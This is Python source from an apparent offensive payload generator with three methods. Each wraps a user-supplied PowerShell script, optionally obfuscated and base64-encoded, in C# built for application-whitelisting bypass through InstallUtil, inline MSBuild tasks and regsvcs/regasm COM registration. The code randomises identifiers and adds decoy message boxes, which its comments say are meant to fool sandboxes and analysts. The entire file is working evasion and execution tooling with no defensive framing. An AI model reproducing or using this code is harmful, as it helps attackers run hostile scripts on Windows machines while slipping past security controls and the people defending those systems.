def generate(self):
options = []
for option in self.cli_opts.c:
if "," in option:
options = option.split(",")
if " " in option:
options = option.split(" ")
for o in options:
for i in self.required_options:
if i in o:
self.required_options[i][0] = o.strip("{0}=".format(i))
with open(self.required_options["SCRIPT"][0], "r") as f:
the_script = f.read()
if self.required_options["FUNCTION"][0].lower() != "x":
# Append FUNCTION to end of script
the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
FunctionName = self.required_options["FUNCTION"][0]
else:
FunctionName = "\"None\""
if self.required_options["OBFUSCATION"][0].lower() != "x":
if self.required_options["OBFUSCATION"][0].lower() == "binary":
the_script = invoke_obfuscation.binaryEncode(the_script)
elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
the_script = invoke_obfuscation.asciiEncode(the_script)
else:
the_script = invoke_obfuscation.binaryEncode(the_script)
# randomize all our variable names, yo'
className = bypass_helpers.randomString()
classNameTwo = bypass_helpers.randomString()
classNameThree = bypass_helpers.randomString()
execName = bypass_helpers.randomString()
bytearrayName = bypass_helpers.randomString()
funcAddrName = bypass_helpers.randomString()
savedStateName = bypass_helpers.randomString()
messWithAnalystName = bypass_helpers.randomString()
shellcodeName = bypass_helpers.randomString()
rand_bool = bypass_helpers.randomString()
random_out = bypass_helpers.randomString()
hThreadName = bypass_helpers.randomString()
threadIdName = bypass_helpers.randomString()
pinfoName = bypass_helpers.randomString()
num_tabs_required = 0
# get random variables for the API imports
r = [bypass_helpers.randomString() for x in range(16)]
y = [bypass_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
payload_code += "\tpublic class {0} {{\n".format(className)
payload_code += "\t\tpublic static void Main()\n\t\t{\n"
# lets add a message box to throw offf sandbox heuristics and analysts :)
# there is no decryption routine, troll.level = 9000
# TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
payload_code += "\t\t}\n\t}\n\n"
payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo)
payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName)
payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
encodedScript = bypass_helpers.randomString()
encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii')
powershellCmd = bypass_helpers.randomString()
data = bypass_helpers.randomString()
command = bypass_helpers.randomString()
RunPSCommand = bypass_helpers.randomString()
cmd = bypass_helpers.randomString()
runspace = bypass_helpers.randomString()
scriptInvoker = bypass_helpers.randomString()
pipeline = bypass_helpers.randomString()
results = bypass_helpers.randomString()
stringBuilder = bypass_helpers.randomString()
obj = bypass_helpers.randomString()
RunPSFile = bypass_helpers.randomString()
script = bypass_helpers.randomString()
ps = bypass_helpers.randomString()
e = bypass_helpers.randomString()
payload_code += """string {0} = "{1}";
string {2} = "";
byte[] {3} = Convert.FromBase64String({0});
string {4} = Encoding.ASCII.GetString({3});
{2} = {4};
try
{{
Console.Write({5}({2}));
}}
catch (Exception {6})
{{
Console.Write({6}.Message);
}}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
payload_code +="""}}
public static string {0}(string {1})
{{
Runspace {2} = RunspaceFactory.CreateRunspace();
{2}.Open();
RunspaceInvoke {3} = new RunspaceInvoke({2});
Pipeline {4} = {2}.CreatePipeline();
{4}.Commands.AddScript({1});
{4}.Commands.Add("Out-String");
Collection<PSObject> {5} = {4}.Invoke();
{2}.Close();
StringBuilder {6} = new StringBuilder();
foreach (PSObject {7} in {5})
{{
{6}.Append({7});
}}
return {6}.ToString().Trim();
}}
public static void {8}(string {9})
{{
PowerShell {10} = PowerShell.Create();
{10}.AddScript({9}).Invoke();
}}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps)
payload_code += "\n}"
self.payload_source_code = payload_code
return
def generate(self):
options = []
for option in self.cli_opts.c:
if "," in option:
options = option.split(",")
if " " in option:
options = option.split(" ")
for o in options:
for i in self.required_options:
if i in o:
self.required_options[i][0] = o.strip("{0}=".format(i))
# randomize all our variable names, yo'
targetName = bypass_helpers.randomString()
namespaceName = bypass_helpers.randomString()
className = bypass_helpers.randomString()
FunctionName = bypass_helpers.randomString()
num_tabs_required = 0
# get 12 random variables for the API imports
r = [bypass_helpers.randomString() for x in range(12)]
y = [bypass_helpers.randomString() for x in range(17)]
with open(self.required_options["SCRIPT"][0], "r") as f:
the_script = f.read()
if self.required_options["OBFUSCATION"][0].lower() != "x":
if self.required_options["FUNCTION"][0] != "x":
# Append FUNCTION to end of script
the_script += "\n{0}".format(
self.required_options["FUNCTION"][0])
if self.required_options["OBFUSCATION"][0].lower() == "binary":
the_script = invoke_obfuscation.binaryEncode(the_script)
elif self.required_options["OBFUSCATION"][0].lower(
) == "ascii":
the_script = invoke_obfuscation.asciiEncode(the_script)
self.required_options["FUNCTION"][0] = "x"
else:
if self.required_options["OBFUSCATION"][0].lower() == "binary":
the_script = invoke_obfuscation.binaryEncode(the_script)
elif self.required_options["OBFUSCATION"][0].lower(
) == "ascii":
the_script = invoke_obfuscation.asciiEncode(the_script)
self.required_options["FUNCTION"][0] = "x"
if self.required_options["FUNCTION"][0].lower() != "x":
# The header for MSBuild XML files
# TODO: Fix the awful formatting
# Set FUNCTION to None if using Invoke-Obfuscation
msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName>
</PropertyGroup>
<Target Name="{0}">
<{1} />
</Target>
<UsingTask
TaskName="{1}"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
""".format(targetName, className,
self.required_options["FUNCTION"][0])
else:
# The header for MSBuild XML files
# TODO: Fix the awful formatting
# Set FUNCTION to None if using Invoke-Obfuscation
msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n\t
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName>
</PropertyGroup>
<Target Name="{0}">
<{1} />
</Target>
<UsingTask
TaskName="{1}"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
""".format(targetName, className, "None")
if self.required_options["OBFUSCATION"][0].lower() != "x":
if self.required_options["OBFUSCATION"][0].lower() == "binary":
the_script = invoke_obfuscation.binaryEncode(the_script)
elif self.required_options["OBFUSCATION"][0].lower(
) == "ascii":
the_script = invoke_obfuscation.asciiEncode(the_script)
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
payload_code += "public class %s : Task, ITask {\n" % (className)
payload_code += "\npublic string {0} = \"$(FunctionName)\";".format(
FunctionName)
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
encodedScript = bypass_helpers.randomString()
encodedScriptContents = base64.b64encode(bytes(
the_script, 'latin-1')).decode('ascii')
powershellCmd = bypass_helpers.randomString()
data = bypass_helpers.randomString()
command = bypass_helpers.randomString()
RunPSCommand = bypass_helpers.randomString()
cmd = bypass_helpers.randomString()
runspace = bypass_helpers.randomString()
scriptInvoker = bypass_helpers.randomString()
pipeline = bypass_helpers.randomString()
results = bypass_helpers.randomString()
stringBuilder = bypass_helpers.randomString()
obj = bypass_helpers.randomString()
RunPSFile = bypass_helpers.randomString()
script = bypass_helpers.randomString()
ps = bypass_helpers.randomString()
e = bypass_helpers.randomString()
payload_code += """string {0} = "{1}";
string {2} = "";
if ({3} != "None")
{{
byte[] {4} = Convert.FromBase64String({0});
string {5} = Encoding.ASCII.GetString({4});
{2} = {5} + "" + {3};
}}
else
{{
byte[] {4} = Convert.FromBase64String({0});
string {5} = Encoding.ASCII.GetString({4});
{2} = {5};
}}
try
{{
Console.Write({6}({2}));
}}
catch (Exception {7})
{{
Console.Write({7}.Message);
}}""".format(encodedScript, encodedScriptContents, powershellCmd,
FunctionName, data, command, RunPSCommand, e)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
payload_code += """return true;
}}
//Based on Jared Atkinson's And Justin Warner's Work
public static string {0}(string {1})
{{
Runspace {2} = RunspaceFactory.CreateRunspace();
{2}.Open();
RunspaceInvoke {3} = new RunspaceInvoke({2});
Pipeline {4} = {2}.CreatePipeline();
{4}.Commands.AddScript({1});
{4}.Commands.Add("Out-String");
Collection<PSObject> {5} = {4}.Invoke();
{2}.Close();
StringBuilder {6} = new StringBuilder();
foreach (PSObject {7} in {5})
{{
{6}.Append({7});
}}
return {6}.ToString().Trim();
}}
public static void {8}(string {9})
{{
PowerShell {10} = PowerShell.Create();
{10}.AddScript({9}).Invoke();
}}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results,
stringBuilder, obj, RunPSFile, script, ps)
payload_code += "}\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
payload_code = msbuild_header + payload_code
self.payload_source_code = payload_code
return
def generate(self):
with open(self.required_options["SCRIPT"][0], "r") as f:
the_script = f.read()
if self.required_options["FUNCTION"][0].lower() != "x":
# Append FUNCTION to end of script
the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
FunctionName = self.required_options["FUNCTION"][0]
if self.required_options["OBFUSCATION"][0].lower() != "x":
if self.required_options["OBFUSCATION"][0].lower() == "binary":
the_script = invoke_obfuscation.binaryEncode(the_script)
elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
the_script = invoke_obfuscation.asciiEncode(the_script)
else:
the_script = invoke_obfuscation.binaryEncode(the_script)
# randomize all our variable names, yo'
className = bypass_helpers.randomString()
classNameTwo = bypass_helpers.randomString()
namespace = bypass_helpers.randomString()
key = bypass_helpers.randomString()
execName = bypass_helpers.randomString()
num_tabs_required = 0
# get random variables for the API imports
r = [bypass_helpers.randomString() for x in range(16)]
y = [bypass_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Threading; using System.EnterpriseServices; using System.Runtime.InteropServices; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
payload_code += "namespace {0}\n {{".format(namespace)
payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(
className)
# placeholder for legitimate C# program
# lets add a message box to throw offf sandbox heuristics and analysts :)
payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(
className)
payload_code += "\n\t\t[ComRegisterFunction]"
payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(
key)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(
classNameTwo, execName)
payload_code += "\n[ComUnregisterFunction]"
payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(
key)
payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
classNameTwo, execName)
payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo)
payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
encodedScript = bypass_helpers.randomString()
encodedScriptContents = base64.b64encode(bytes(
the_script, 'latin-1')).decode('ascii')
powershellCmd = bypass_helpers.randomString()
data = bypass_helpers.randomString()
command = bypass_helpers.randomString()
RunPSCommand = bypass_helpers.randomString()
cmd = bypass_helpers.randomString()
runspace = bypass_helpers.randomString()
scriptInvoker = bypass_helpers.randomString()
pipeline = bypass_helpers.randomString()
results = bypass_helpers.randomString()
stringBuilder = bypass_helpers.randomString()
obj = bypass_helpers.randomString()
RunPSFile = bypass_helpers.randomString()
script = bypass_helpers.randomString()
ps = bypass_helpers.randomString()
e = bypass_helpers.randomString()
payload_code += """string {0} = "{1}";
string {2} = "";
byte[] {3} = Convert.FromBase64String({0});
string {4} = Encoding.ASCII.GetString({3});
{2} = {4};
try
{{
Console.Write({5}({2}));
}}
catch (Exception {6})
{{
Console.Write({6}.Message);
}}""".format(encodedScript, encodedScriptContents,
powershellCmd, data, command, RunPSCommand, e)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
payload_code += """}}
public static string {0}(string {1})
{{
Runspace {2} = RunspaceFactory.CreateRunspace();
{2}.Open();
RunspaceInvoke {3} = new RunspaceInvoke({2});
Pipeline {4} = {2}.CreatePipeline();
{4}.Commands.AddScript({1});
{4}.Commands.Add("Out-String");
Collection<PSObject> {5} = {4}.Invoke();
{2}.Close();
StringBuilder {6} = new StringBuilder();
foreach (PSObject {7} in {5})
{{
{6}.Append({7});
}}
return {6}.ToString().Trim();
}}
public static void {8}(string {9})
{{
PowerShell {10} = PowerShell.Create();
{10}.AddScript({9}).Invoke();
}}""".format(RunPSCommand, cmd, runspace, scriptInvoker,
pipeline, results, stringBuilder, obj, RunPSFile,
script, ps)
payload_code += "\n}" * 2
self.payload_source_code = payload_code
return